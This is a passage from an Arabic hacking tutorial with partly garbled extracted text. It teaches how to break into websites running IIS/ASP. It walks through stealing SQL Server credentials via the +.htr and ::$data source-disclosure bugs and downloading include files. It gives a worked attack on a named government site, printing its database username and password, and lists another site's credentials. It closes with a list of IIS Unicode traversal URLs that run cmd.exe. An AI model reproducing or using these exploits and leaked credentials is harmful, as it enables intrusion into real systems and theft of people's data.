‫ﺘﻮي‬ ‫ﺘﻮي ﻋﻠﻰاﻛﺜ ﺮ ﻣﻦﻗﺎﻋﺪةﺑﯿﺎﻧﺎ ت وﻛ ﻞﻗﺎﻋﺪةﺑﯿﺎﻧﺎ تﺗ ﺤ‬ ‫ﺎﯾ ﻀﺎ ﻣﺎارﯾﺪانا ﺧﺒ ﺮكﺑﻪان ﺎ ل ‪SQL‬ﻗﺪﺗ ﺤ‬
‫ﺘﻮﯾﻬﺎ ‪.‬‬ ‫ﺘﻰﺗ ﺤ‬‫ﻗﻮاﻋﺪﺑﯿﺎﻧﺎ ت ‪ SQL‬ﻮاﻟﻌﺪداﻟﻜﺒﯿ ﺮ ﻣﻦاﻟﺒﯿﺎﻧﺎ تاﻟ‬ ‫ﺘﺼﻮرﻛﺒ ﺮ‬ ‫ﻋﻠﻰ ﻋﺪد ﻣﻦ ﺎﻟﺠﺪاو ل ﯾﻤﻜﻦ انﺗ‬
‫ﻗ ﺖﻗﺎﻋﺪةﺑﯿﺎﻧﺎ ت ‪ SQL‬؟‬ ‫ﺘﺮ‬
‫ﺘﻔﯿﺪ ﻣﻨﻪاذاا ﺧ‬‫ﺲ ‪ :‬ﻣﺎﻟﺬي ﯾﻤﻜﻦاناﺳ‬
‫ﺘﺪﯾﺎ ت ‪ASP‬ﻓﻲ‬ ‫ﺘﺪﯾﺎ ت ‪PHP‬ﺑ ﻞ ﻣﻨ‬ ‫ﻗﺼﺪ ﻣﻨ‬ ‫ﺘﺪى ﻻا‬ ‫ﻗﻊ ﻣﻨ‬‫ﻗﻊاذاﻛﺎن ﻫﺬااﻟﻤﻮ‬ ‫ﻫﺬا ﻋﻠﻰ ﺣﺴﺐ ﻧﺸﺎطاﻟﻤﻮ‬
‫اﻟﻐﺎﻟﺐ ﺳﻮ فﺗ ﺤﺼ ﻞ ﻋﻠﻰ ﺟﻤﯿﻊاﺳﻤﺎ ء‬
‫ﺘﺨﺪﻣﯿﻦ وﻛﻠﻤﺎ تاﻟﺴ ﺮ ﻮﺑﺎﻣﻜﺎﻧﻚﺗﻌﺪﯾ ﻞ و ﺣﺬ فاي ﻣﻮ ﺿﻮ ع و ﺻﻼ ﺣﯿﺎ تﻟﻢﺗﻜﻦﺗ ﺤﻠﻢﺑﻬﺎ ‪،‬اﻣﺎاذاﻛﺎن‬ ‫ﺎﻟﻤﺴ‬
‫ﺘﻮي ﻋﻠﻰ ﻣﯿﺰة‬ ‫ﻗﻊ ﯾ ﺤ‬‫اﻟﻤﻮ‬
‫ﻗﺎﺋﻤﺔاﻟﻤ ﺮاﺳﻼ تﻓﺴﻮ فﺗ ﺤﺼ ﻞ ﻋﻠﻰاﻋﺪاد ﺧﯿﺎﻟﯿﺔ ﻣﻦاﻻﯾﻤﯿﻼ ت ‪ ،‬ﻋﻨﺪﻫﺎﻗﻢﺑﺎﻧﺸﺎ ء ﺷ ﺮﻛﺔﻟﻠﺪﻋﺎﯾﺔ واﻻﻋﻼن‬
‫وﺳﻮ فﺗﺼﺒﺢﺛ ﺮﯾﺎاذن ﻻﺗﻨﺴﻰ _‪LinuxRay‬‬
‫ﻗﺎم ﻫﻮاﺗ ﻒ ‪ -‬ﻋﻨﺎوﯾﻦ ‪-‬ﺗﻮراﯾ ﺦاﻟﻤﯿﻼد ‪،‬‬ ‫ﻗﻊانﺗﺠﺪ ﺎي ﺷﺊ دا ﺧ ﻞﻗﻮاﻋﺪﺑﯿﺎﻧﺎ ت ﻣﻌﻠﻮﻣﺎ تاﺷﺨﺎ ص ‪-‬ار‬ ‫ﺗﻮ‬
‫ﻣﻤﻜﻦانﺗﺼﺒﺢ ‪Administrator .‬‬
‫ﺘﻌﺪ ﻧﺸﺎ ﻃﻚ ﻣﻦ ﺟﺪﯾﺪﻓﺎﻟﻄ ﺮﯾ ﻖ ﻣﺎزا ل ﻃﻮﯾﻼ ‪...‬‬ ‫ﺎﻋ ﺮ فاﻧﻪﻗﺪا ﺻﺎﺑﻚاﻟﻤﻠ ﻞاﻻنﻟﻜﻦاﺳ‬
‫ﺘﺎﺟﺔﻟﻠﺪ ﺧﻮ ل ﻋﻠﻰﻗﻮاﻋﺪﺑﯿﺎﻧﺎ ت ‪ SQL‬؟‬ ‫ﺲ ‪ :‬ﻣﺎﻟﺬيﺗ ﺤ‬
‫ﺘﺎجﻓﻘﻂﻟ ﻞ ‪ User Name‬ﻮ ‪Passwd‬‬ ‫ﺗﺤ‬

‫ﺘﺨﺪم وﻛﻠﻤﺔاﻟﻤ ﺮور ؟‬


‫ﺲ ‪ :‬ﻣﻦاﯾﻦ ﺎ ﺣﺼ ﻞ ﻋﻠﻰاﺳﻢاﻟﻤﺴ‬

‫‪٧٠‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ﻫﻨﺎك ﻃ ﺮ ق ﻋﺪﯾﺪةﻟﻠ ﺤﺼﻮ ل ﻋﻠﻰ ‪ User name and Passwd‬ﻣﻨﻬﺎﻛﻤﺎاﺳﻠ ﻒ ﺻﻔ ﺤﺎ تا ل ‪ASP‬‬


‫ﻮﻣﻠﻔﺎ تا ﺧ ﺮى ﻣﻦ ﻧﻮ ع ‪*.sql‬ﻫﻨﺎكﺛﻐ ﺮا تﻛﺜﯿ ﺮ ﯾﻤﻜﻦ‬
‫ﺎنﺗ ﺤﺼ ﻞ ﻣﻨﻬﺎ ﻋﻠﻰﻛﻠﻤﺎ تاﻟﻤ ﺮور ﻣﺜ ﻞﺛﻐ ﺮة ‪+.htr‬‬
‫ﺘﺨﺪم ﻫﺬهاﻟﺜﻐ ﺮة ‪:‬‬ ‫ﻛﯿ ﻒﺗﺴ‬
‫‪http://target/page.asp+.htr‬‬
‫ﻗﻊاﻟﻬﺪ ف‬ ‫‪target :‬ﺎﻟﻤﻮ‬
‫‪ Page :‬ﺻﻔ ﺤﺔ ‪asp‬‬
‫‪+.htr :‬ﺎﻟﺜﻐ ﺮة‬
‫ﺘﺴﺎ ء ل ﻣﺎﻟﻔﺎﺋﺪة‬
‫ﺘﻮي ﻋﻠﻰاي ﺣ ﺮ ف ‪....‬اﻋ ﺮ فاﻧﻚ ﺳﻮ فﺗ‬ ‫ﺘﺢ ﺻﻔ ﺤﺔﺑﯿ ﻀﺎ ء ﻻﺗ ﺤ‬‫ﻫﺬهاﻟﺜﻐ ﺮةﺗﻘﻮما ﺣﯿﺎﻧﺎﺑﻔ‬
‫اذن ﻣﻨﻬﺎاﻟﻔﺎﺋﺪة ﻫﻮ ﺧﻠ ﻒ ﻫﺬهاﻟﺼﻔ ﺤﺔاﻟﺒﯿ ﻀﺎ ءاذﻫﺐاﻟﻰ ‪View Source‬ﻟﻜﻲﺗ ﺮىاواﻣ ﺮاﻟﺒ ﺮﻣﺠﺔ‬
‫ﺘﻰ ﻻﯾﻤﻜﻦﻟﻚانﺗ ﺮاﻫﺎﻓﻲاﻟﻮ ﺿﻊاﻟﻌﺎدي ‪ :‬ﻣﺜ ﻞ‬ ‫اﻟﺨﺎﺻﺔ ب ‪ ASP‬ﺎﻟ‬

‫‪<%‬‬

‫)"‪Set DB= Server.CreateObject("ADODB.Connection‬‬


‫‪DB.Open "DRIVER=SQL‬‬
‫‪Server;SERVER=xxx;UID=sa;PWD=;APP=Microsoft (R) Developer‬‬
‫"‪Studio;WSID=xxx;DATABASE=moe_dbs", "_LinuxRay", "6666666‬‬

‫>‪%‬‬
‫‪------------------------------------------------------------------‬‬
‫ﺘﺨﺪمﻫﻮ ‪_LinuxRay‬‬ ‫ﻓﻲ ﺎﻟﻜﻮداﻟﺴﺎﺑ ﻖﺗ ﺮىاناﺳﻢاﻟﻤﺴ‬
‫ﻮﻛﻠﻤﺔاﻟﺴ ﺮﻫﻲ ‪٦٦٦٦٦٦٦‬‬
‫‪------------------------------------------------------------------‬‬

‫ﺎﻟﺸﺊاﻟﻤ ﻀ ﺤﻚاﻧﻪا ﺣﯿﺎﻧﺎاذاﻛﺎن ﻫﻨﺎك ﺧﻄﺄﻓﻲ ﺻﻔ ﺤﺔا ل ‪ ASP‬ﻣﺜ ﻞاﻻﺗﻲ ‪:‬‬

‫'‪AMicrosoft VBScript runtime error '800a01a8‬‬

‫'‪Object required: 'Conn‬‬

‫‪/filename.inc, line 5‬‬

‫ﺘﻮي ﻋﻠﻰاﺳﻢ‬
‫ﺘﻢﺗﻨﻔﯿﺬﻫﺎ ﻣﻦ ﺟﺎﻧﺐاﻟﻤﻠﻘﻢ وﯾ ﺤ‬
‫ﺘﻮي ﻋﻠﻰاواﻣ ﺮ ﯾ‬
‫ﺘﺪاد ‪*.inc‬ﻫﺬا ﻣﻠ ﻒ ﯾ ﺤ‬
‫ﺘﻬﻲﺑﺎﻣ‬ ‫ﻫﻨﺎك ﻣﻠ ﻒ ﯾﻨ‬
‫ﺘﺨﺪم وﻛﻠﻤﺔ ﺎﻟﻤ ﺮور‬ ‫اﻟﻤﺴ‬
‫ﻗﻊ ‪.‬‬
‫ﺘﻈ ﺮﻗﻢﺑﺴ ﺤﺐ ﻫﺬااﻟﻤﻠ ﻒ وذﻟﻚﺑﺎ ﺿﺎﻓﺔاﺳﻢاﻟﻤﻠ ﻒﻓﻲ ﻋﻨﻮان ﺎﻟﻤﻮ‬ ‫اذن ﻣﺎذاﺗﻨ‬

‫ﻮﻣﻤﻜﻦانﺗ ﺮى ﻣﺜ ﻞ ﻫﺬااﻻﻣ ﺮﻓﻲ ﺻﻔ ﺤﺔ ‪ASP‬‬

‫‪٧١‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ﻋﻨﺪﺗﻄﺒﯿ ﻖاﻟﺜﻐ ﺮة ﻋﻠﯿﻬﺎ ﻫﺬا ﯾﻌﻨﻲاناواﻣ ﺮاﻟﺒ ﺮﻣﺠﺔ دا ﺧ ﻞ ﻣﻠ ﻒ ‪database.inc‬‬

‫>‪<!--#include file = "database.inc"--‬‬

‫ﺘﻮي ﻋﻠﻰﻛﻠﻤﺔاﻟﻤ ﺮور ﻣﺜ ﻞ ﻣﻠﻔﺎ ت‬


‫ﻮﻫﻨﺎك ﻋﺪة ﻣﻠﻔﺎ تﺗ ﺤ‬

‫‪global.asa‬‬
‫‪++global.asa‬‬
‫‪beforemilion-global.asa‬‬
‫‪-global.asa‬‬
‫‪milion.sql‬‬
‫‪global-direct.asa‬‬

‫ﺘﺎد ﻋﻠﯿﻪ ﻣﻦﻗﺒ ﻞ ﻣﺒ ﺮﻣﺠﯿﻦ ‪SQL‬‬


‫ﻟﯿ ﺲ ﻣﻦاﻟ ﻀ ﺮورةانﺗﻜﻮناﻟﻤﻠﻔﺎ تﺑﻬﺬهاﻻﺳﻤﺎ ءﻟﻜﻦ ﻫﺬا ﻫﻮاﻟﻤﻌ‬

‫ﺘﺐاﺳﻢاﻟﺼﻔ ﺤﺔ ﻣﺜ ﻞاﻻﺗﻲ ‪:‬‬


‫ﻮﻛ ﻞ ﻣﺎﻋﻠﯿﻚﻓﻌﻠﻪانﺗﻜ‬

‫‪global.asa+.htr‬‬

‫ﻫﻨﺎكﺛﻐ ﺮةﻗﺪﯾﻤﺔﻓﻲ ‪ IIS 3‬ﻮﻫﻲانﺗ ﻀﯿ ﻒﺑﻌﺪ ﺻﻔ ﺤﺔ ‪ASP‬ﻫﺬااﻟ ﺮﻣﺰ ‪::$data‬ﻛﻤﺎ ﯾﻠﻲ‬


‫‪file.asp::$data‬‬
‫ﺘﻄﺒﯿﻘﻬﺎﻓﻘﻂﻟﻠﻌﻠﻢ ﻻاﻛﺜ ﺮ ‪.‬‬
‫ﺘﻌﺐ ﻧﻔﺴﻚﺑ‬
‫ﻫﺬهاﻟﺜﻐ ﺮة ﻻﺗﻌﻤ ﻞاﻻ ﻋﻠﻰ ‪IIS 3‬ﻓﻼﺗ‬

‫ﺘﺨﺪم وﻛﻠﻤﺔاﻟﻤ ﺮور ؟؟‬


‫ﺘ ﺮﺑﻨﺎ ﻣﻦاﻟﻨﻬﺎﯾﺔ ‪ ...‬ﻣﺎذاﺑﻌﺪاﻟ ﺤﺼﻮ ل ﻋﻠﻰ ﺎﺳﻢاﻟﻤﺴ‬
‫ﻗ‬‫ﻟﻘﺪا‬

‫ﺑﻌﺪﻫﺎاﻟﺪ ﺧﻮ ل ﻋﻠﻰﻗﺎﻋﺪةا ل !! ‪SQL‬‬

‫ﺘﺨﺪم ‪Visual interdev 6.0‬ﻟﻜﻨﻲ ﻣﺎزﻟ ﺖاﻓ ﻀ ﻞ‬


‫ﻫﻨﺎك ﻋﺪةﺑ ﺮاﻣ ﺞﺗﺪ ﺧ ﻞ ﻋﻠﻰﻗﺎﻋﺪةاﻟﺒﯿﻨﺎ تاﻧﺎاﺳ‬
‫ﺘﺨﺪاماﻟﺒ ﺮﻧﺎﻣ ﺞاﻟﺴﻬ ﻞ ‪ACCESS 2000‬‬ ‫اﺳ‬

‫ﺘﺢاﻟﺒ ﺮﻧﺎﻣﺢاﻟﺬﻫﺎباﻟﻰﻗﺎﺋﻤﺔ‬ ‫ﻛ ﻞ ﻣﺎ ﻋﻠﯿﻚﻓﻌﻠﻪﻫﻮﻓ‬


‫‪File‬‬
‫ﺘﺮ‬‫ﺎﺧ‬
‫‪New‬‬
‫ﺘﺎر‬
‫ﻮﻣﻦﻗﺎﺋﻤﺔاﻟﻤﻠﻔﺎ ت ﺎﻟﺠﺪﯾﺪةا ﺧ‬
‫)‪Project (Exiting Data‬‬
‫ﺎي ﻣﺸ ﺮو عﻗﺎﻋﺪةﺑﯿﺎﻧﺎ ت ﻣﻮﺟﻮدة ‪.‬‬
‫ﺘﺮ‬ ‫ﺳﯿﻈﻬ ﺮﻟﻚ ﻣ ﺮﺑﻊ ﻻﻧﺸﺎ ءاﻟﻤﻠ ﻒا ﺧ‬
‫‪Create‬‬

‫‪٧٢‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ﺎياﻧﺸﺎ ء‬

‫ﺘ ﺮى ﻣ ﺮﺑﻊ‬
‫ﺎﻻن ﺳ‬
‫‪Data Link Properties‬‬

‫ﺘﺨﺪم ‪-‬ﻛﻠﻤﺔاﻟﻤ ﺮور‬


‫ﻗﻊاواﻻيﺑﻲ ‪-‬اﺳﻢاﻟﻤﺴ‬
‫ﺘﺎجﻓﻘﻂﻟﺜﻼ ث ﻣﻌﻠﻮﻣﺎ تاﺳﻢاﻟﻤﻮ‬
‫ﺗﺤ‬

‫ﻗﻊﻓﻲ ﺻﻨﺪو ق ‪Select or enter server name‬‬


‫‪-١‬اد ﺧ ﻞاﺳﻢاﻟﻤﻮ‬

‫ﺘﺨﺪمﻓﻲ ‪User Name‬‬


‫‪ -٢‬ﺎﺳﻢاﻟﻤﺴ‬

‫‪-٣‬ﻛﻠﻤﺔاﻟﺴ ﺮ ‪Password‬‬

‫ﻣﻼ ﺣﻈﺔ )ﻗﻢﺑﺈزاﻟﺔاﻟﺼﺢ ﻣﻦ ﻣ ﺮﺑﻊ )‪Blank Password‬‬

‫ﺘﺒﺎراﻻﺗﺼﺎ لﺑﻘﺎﻋﺪة ﺎﻟﺒﯿﺎﻧﺎ تاذا رأﯾ ﺖ ﻫﺬه‬ ‫ﺎ ﺿﻐﻂﻓﻲاﻟﺒﺪاﯾﺔ ﻋﻠﻰ ‪Test Connection‬ﻓﻲاﻻﺳﻔ ﻞ ﻻ ﺧ‬
‫اﻟﻌﺒﺎرة ‪Test Connection Succeeded‬‬
‫ﻓﻤﻌﻨﺎهاناﻻﺗﺼﺎ لﺑﻘﺎﻋﺪةاﻟﺒﯿﺎﻧﺎ تﺗﻢﺑﻨﺠﺎ ح‪.‬‬
‫ﺘﺎرايﻗﺎﻋﺪةﺑﯿﺎﻧﺎ تﺗ ﺮﯾﺪاﻟﺪ ﺧﻮ ل ﺎﻟﯿﻬﺎ ﻣﻦاﻟﻘﺎﺋﻤﺔاﻟﻤﺴﻨﺪﻟﺔ ‪:‬‬ ‫ﯾﻤﻜﻨﻚاﻻنانﺗﺨ‬
‫‪Select the data base on the server‬‬
‫ﻮا ﺿﻐﻂ ﻋﻠﻰ ‪ OK‬ﺎو ﻣﻮاﻓ ﻖ ‪.‬‬

‫ﺘﺠﺎرب ‪:‬‬
‫ﻓﺌ ﺮاناﻟ‬
‫ﻗﻊ ‪http://www .moe.gov.sa/‬‬ ‫ﻣﻮ‬

‫ﺘﺎﻟﯿﺔ ‪:‬‬
‫ﻗﻢﺑﺎﻟﺪ ﺧﻮ ل ﻋﻠﻰاﻟﺼﻔ ﺤﺔ ﺎﻟ‬
‫‪1-‬‬

‫‪http://www.moe.gov.sa/news_admin.asp‬‬

‫ﺘ ﺮى ﻣﺎﯾﻠﻲ‬
‫ﺳ‬

‫'‪Microsoft VBScript runtime error '800a01a8‬‬

‫'‪Object required: 'Conn‬‬

‫‪/news_admin.asp, line 7‬‬

‫ﺘﺎﻟﻲ ‪:‬‬
‫ﺛﻢ ﻃﺒ ﻖ ﻋﻠﯿﻬﺎﺛﻐ ﺮة ‪htr‬ﻛ‬

‫‪http://www .moe.gov.sa/news_admin.asp+.htr‬‬

‫‪٧٣‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ﺘ ﺮى‬
‫ﺎذﻫﺐاﻟﻰ ﺎﻟﺴﻮرسﻟ‬
‫>‪<!--#include file = "database.inc"--‬‬

‫ﺘﺎﻟﻲ ‪:‬‬
‫ﻗﻢﺑﺴ ﺤﺐ ﻣﻠ ﻒ ‪database.inc‬ﻛ‬

‫‪http://www.moe.gov.sa/database.inc‬‬

‫ﺳﻮ فﺗ ﺮى ﻣﺎﯾﻠﻲ ‪:‬‬

‫‪<%‬‬

‫)"‪Set DB= Server.CreateObject("ADODB.Connection‬‬


‫‪DB.Open "DRIVER=SQL‬‬
‫‪Server;SERVER=CNW2;UID=sa;PWD=;APP=Microsoft (R) Developer‬‬
‫"‪Studio;WSID=CNW2;DATABASE=moe_dbs", "sa", "123321‬‬

‫>‪%‬‬

‫ﺘﺸﺒﯿﻚ ﻋﻠﻰﻗﺎﻋﺪةاﻟﺒﯿﺎﻧﺎ ت‬
‫ﺘﺨﺪم وﻛﻠﻤﺔاﻟﻤ ﺮور ‪ .....‬ﺳﺎر عﺑﺎﻟ‬
‫ﻫ ﻞﺗﻌ ﺮ ف ﻣﺎﻟﺬياﻣﺎم ﻋﯿﻨﻚاﻻناﻧﻪاﺳﻢاﻟﻤﺴ‬
‫اﻧﺎاﻋ ﺮ فان ﻻا ﺣﺪ ﯾ ﺤﺐ ﻣﺎدة‬
‫ﺎﻟﻜﯿﻤﯿﺎ ء ‪.‬‬

‫ﺘﺠﺎرباﻟﺜﺎﻧﻲ ‪:‬‬
‫ﻓﺄراﻟ‬

‫ﻗﻊ ‪http://www .itsalat.com/‬‬


‫ﻣﻮ‬

‫‪1 - User name : sa Passwd : sp2000‬‬

‫********************************************************************************‬
‫ﺘﺪﯾﺎ ت‬
‫ﺘ ﺮا قاﻟﻤﻨ‬
‫‪ -٤‬ﺳ ﺮﻓ ﺮا تاﻟﻮﯾﻨﺪوز ودورهﻓﻲا ﺧ‬
‫^^^^^^^^^^^^^^^^^^^^^^^^^^^^^‬
‫ﺘﺪي ﯾﻌ ﺮ فﺛﻐ ﺮا تاﻟﻮﯾﻨﺪوز ﺟﯿﺪا دا‬ ‫ﻧ ﺤﻦ ﺎﻟﻬﻜ ﺮز وايﻫﻜ ﺮز ﻣﺒ‬
‫ﺛﻐ ﺮاﺗﻪﺑﺎﻻاﻟﻮ ف‬‫ﻮﻫﻲ ﻧﻈﺎمﻓﺎﺷ ﻞ ‪ %٨٠‬و‬
‫ﺘﺎ ت‬
‫ﺛﺒ‬
‫ﻗﻠﻜﻢﻟﯿ ﺶﺑﺎا‬
‫ﺘ ﻀﯿ ﻒ ﺳ ﺮﻓ ﺮا ت وﯾﻨﺪوز را حا‬‫ﻗﻊ ﯾﺴ‬ ‫ﺘﺪي وﻣﻮ‬ ‫وﻻاﻧﺼﺢايا خﻟﺪﯾﻪ ﻣﻨ‬

‫ﺘﻮي ﻋﻠﻲ‬
‫ﺻﻮر‪ ٢‬ﻫﻮ ﺻﻮرةﻟﺠﻤﻌﯿﺔاﻣ ﺮﯾﻜﻲ ﻣﻬﻢ و ﺣﺠﻢﻗﺎﻋﺪا تاﻟﺒﯿﺎﻧﺎ ت ‪١٫٥‬ﻛﯿﻚ ﯾﻌﻨﻲ ‪ 15000‬ﻣﯿﻚ وﯾ ﺤ‬
‫ﻗﻊﻟﺠﺎﻫﺰيﻛﺎﻣﻼ‬‫ﻗﻪاﻟﺒﺎر ﺣﻪﺑﻨﻔﺴﻲ ﺟﺎريﺗ ﺤﻤﯿ ﻞاﻟﻤﻮ‬ ‫ﺘ ﺮا‬
‫ﺘ ﺮكﺗﻢا ﺧ‬
‫ﺧﻤﺴﺔ ﻣﻠﯿﻦ ﻣﺸ‬

‫ﺘﻤ ﻞ‬‫‪-١‬ﺛﻐ ﺮا تاﻟﻬ‬


‫‪-٢‬اﻟﻔ ﺮوﻧ ﺖﺑﯿ ﺞ‬

‫‪٧٤‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ﺘﻔﺎد ﻣﻨﻪﻛﺜﯿ ﺮﻟﻬﻜ ﺮز‬ ‫ﺘﺒﻲ واﻻﺳ‬ ‫‪ -٣‬ﻣﺨﻠﻔﺎ تاﻻﻓ‬


‫‪-٤‬ﺛﻐ ﺮا تاﻟﺒ ﺮاﻣ ﺞ‬
‫‪ -٥‬ﻋﺪمﺗﻤﻜﻦ ﺣﻤﺎﯾﺔاﻟﻨﻈﺎم‪100%‬‬
‫ﺘﻌﺎد ﻋﻦ ﺳ ﺮﻓ ﺮا تاﻟﻮﯾﻨﺪوز ﻮﺑ ﺮاﻣﺠﻬﻢ‬ ‫ﻻذﻟﻚاﻧﺼﺢاﻻ ﺧﻮهﺑﺎﻻﺑ‬
‫‪IIS‬ﺑﺪاﯾﺔ ﻧﻌ ﺮ ف ﻣﺎﻫﻲ‬
‫ـ‬‫ﺘﻮاﺟﺪةﻓﻲ ﻮﯾﻨﺪوزاﻟﻔﯿﻦﺑ ﺮوﻓﺸﻨﺎ ل ووﯾﻨﺪوزانﺗﻲ‪ IIS‬ﺎﻟ‬ ‫ﻫﻲ ﺧﺪﻣﻪ ﻣ‬
‫ﺘ ﺮﻧ ﺖ‬
‫ﺘﻠﻚ ﺎﻻﺻﺪارةاﻟﺨﺎﻣﺴﺔ ﻣﻦ ﻣﻠﻘﻢ ﻣﻌﻠﻮﻣﺎ تاﻻﻧ‬ ‫‪IIS5.0...‬ﻮوﯾﻨﺪوزاﻟﻔﯿﻦ ﯾﻤ‬
‫ﺑﺴﻢا ﷲ ﻧﺒﺪأ‬
‫ﺘﻐ ﻞﺑﻄ ﺮﯾﻘﺔ ﺳﻬﻠﺔ ﺟﺪا‬
‫ً‬ ‫ﺗﻮﺟﺪ ﻧﻘﻄﺔ ﺿﻌ ﻒﻓﻲاﻻياياس ‪٤‬او ‪ ٥‬وﻫﺬهاﻟﻨﻘﻄﺔﺗﺴ‬
‫ﻮﺗﺴﻤﻰ ﻫﺬهاﻟﻨﻘﻄﺔﺑﺎﻟﯿﻮﻧﯿﻜﻮد‬
‫ﻗﻊ‬‫ﺘ ﺮا قاﻟﻤﻮا‬
‫ﺘﺎجاﻟﻰ ﺧﺒ ﺮة ﻋﻤﯿﻘﺔﻓﻲ ﻣﺠﺎ لا ﺧ‬ ‫ً ﻻﯾ ﺤ‬‫ﻮﺗﻨﻔﯿﺬﻫﺎ ﺳﻬﻼ‬
‫ﺘﺌﯿﺪﺋﻦ‬
‫ﻮﻟﻜﻦ ﻧﻘ ﻒ ﻋﻨﺪﻫﺬهاﻟﻨﻘﻄﺔﻟﻠﻤﺒ‬
‫ﻗﻊ ﺷﻬﯿ ﺮةﺑﻬﺬهاﻟﻄ ﺮﯾﻘﺔ‬ ‫ﺘ ﺮا ق ﻋﺪة ﻣﻮا‬ ‫ً ﯾﻔﻜ ﺮوناﻻنﻓﻲا ﺧ‬ ‫ﺘﺪﺋﯿﻦ ﻋﺎﻣﺔ‬ ‫ﺎﻟﻤﺒ‬
‫ﻗﻊ ﺎﻟﺸﻬﯿ ﺮةاو ﻏﯿ ﺮاﻟ ﺸﻬﯿ ﺮة‬ ‫ﻮﻟﻜﻦ ﻻ ﻫﺬهاﻟﻄ ﺮﯾﻘﺔ ﻏﯿ ﺮ ﻣﺠﺪﯾﺔ ﻣﻊاﻟﻤﻮا‬
‫ﻻن ﻧﻘﻄﺔاﻟ ﻀﻌ ﻒ ﻫﺬه ﻻﺗﻮﺟﺪاﻻﻓﻲ وﯾﻨﺪوزاﻟﻔﯿﻦاوانﺗﻲ‬
‫ﺘﺨﺪماﻧﻈﻤﺔاﻟﯿﻮﻧﻜ ﺲ واﻟﻠﻨﻜ ﺲ‬ ‫ﻗﻊاﻟﺸﻬﯿ ﺮةﺗﺴ‬ ‫ﻮأﻏﻠﺐاﻟﻤﻮا‬
‫ﺘﻪ ﻣ ﺤﺪودة وﻛ ﻞ ﯾﻮمﺗﻄﻠﻊﺛﻐ ﺮا ت ﺟﺪﯾﺪة‬ ‫ﺄيان وﯾﻨﺪوزانﺗﻲ ﺎواﻟﻔﯿﻦ ﻧﻈﺎم ﺣﻤﺎﯾ‬
‫ﻗﻊ ﺎﯾﻘﺎ ف ﻧﻘﻄﺔ ﺿﻌ ﻒ ﻣﻦ ﻧﻘﺎطاﻻ ﺿﻌﺎ فاﻟﻤﻮﺟﻮدةﻓﻲاﻻنﺗﻲ‬ ‫ﻟﻜﻦﺑﻮﺳﻊ ﻣﺪرا ءاﻟﻤﻮا‬
‫ًﻟﻬﻢ ﻣﻦاﻟﻬﻜ ﺮة‬ ‫ﺘﻠﻚاﻟﻄ ﺮﯾﻘﺔﻗﺪ ﯾﻜﻮﻧﻮن ﺟﻌﻠﻮ ﺣﺎﺟﺰا‬ ‫ﻟﻜﻦﺑ‬
‫ﻮﻟﻜﻦﻟﯿ ﺲ داﺋﻤﺎ‬
‫ً‬
‫ﺘﺼﻔﺢ‬ ‫ﻮﺗﻨﻔﺬ ﻣﻦ دا ﺧ ﻞاﻟﻤ‬
‫ﻮ ﻃ ﺮﯾﻘﺔﺗﻨﻔﯿﺬاﻟﺜﻐ ﺮةﻛﺎﻻﺗﻲ ‪:‬‬
‫‪../winnt/system32/cmd.exe?/c+dir+c:\ http://www.xxxxxx.com/scripts/..Á‬‬

‫ﺮﻛﺰوﻫﻨﺎاﻻنﺑﻌﺪ دو تﻛﻮمﺑﺪأ تﺗﻨﻔﯿﺬ ﺎﻟﺜﻐ ﺮة‬


‫ـ ﻋ ﺮ ض ﺟﻤﯿﻊ ﻣﻠﻔﺎ ت‬‫ـ‬
‫ﻮﺑﺈﻣﻜﺎﻧﻚأﯾ ﻀﺎ د ﺧﻮ لاي ﻣﻠ ﻒ وﻟﯿ ﺲﻓﻘﻂ رؤﯾﺔاﻟﺴﻲ‪c:‬ﻫﺬهاﻟﺜﻐ ﺮةﺗﺴﻤﺢﻟﻚﺑ‬
‫ﻮﺗﻮﺟﺪأﻛﺜ ﺮ ﻣﻦﺛﻐ ﺮة وﻫﻲ‬
‫\‪/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:‬‬
‫\‪/scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:‬‬
‫\‪/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:‬‬
‫\‪/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:‬‬
‫\‪/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:‬‬
‫\‪/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:‬‬
‫\‪/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:‬‬
‫\‪/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:‬‬
‫\‪/scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir+c:‬‬
‫\‪/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:‬‬
‫\‪/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:‬‬
‫\‪/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:‬‬
‫\‪/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:‬‬
‫‪/msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system‬‬
‫\‪32/cmd.exe\?/c\+dir+c:‬‬

‫‪٧٥‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ﺘﺼﻔﺢ‬ ‫ﻮ ﻃ ﺮﯾﻘﺔﺗﻨﻔﯿﺬﻫﺎ ﻣﻦاﻟﻤ‬


‫ﻗﻊ‬‫ﻮﻣﻜﺎنﺗﻨﻔﯿﺬﻫﺎﺑﻌﺪاﺳﻢاﻟﻤﻮ‬
‫ﻣﺜﺎ ل ‪:‬‬
‫‪http://www .xxxxx.com/à/€/à/€/à/€/¯....2/cmd.exe/?/c\+‬‬
‫ﺄيﺑﻌﺪ دو تﻛﻮم‬
